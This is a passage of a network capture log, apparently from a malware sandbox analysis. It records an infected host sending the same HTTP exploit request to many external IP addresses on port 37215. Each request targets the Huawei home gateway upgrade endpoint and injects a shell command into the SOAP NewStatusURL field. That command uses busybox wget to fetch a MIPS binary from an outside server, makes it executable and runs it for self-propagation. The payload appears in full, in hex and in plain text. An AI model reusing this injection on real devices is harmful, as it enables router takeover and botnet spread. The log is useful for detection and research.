3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1965192.168.2.1333648197.74.233.6337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.572057009 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1966192.168.2.135793041.78.151.6937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.572058916 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1967192.168.2.1354108197.225.95.14437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.572381973 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1968192.168.2.1333100157.56.48.24737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.572384119 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1969192.168.2.133615841.218.37.9337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.572407007 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1970192.168.2.1333772157.106.131.21937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.572408915 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1971192.168.2.1333190157.185.10.637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.572419882 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1972192.168.2.1343344157.74.246.23037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.572432995 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1973192.168.2.1360736137.199.250.11937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.572448969 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1974192.168.2.135416441.234.88.19037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.572577953 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1975192.168.2.135165041.160.202.22937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.572577953 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
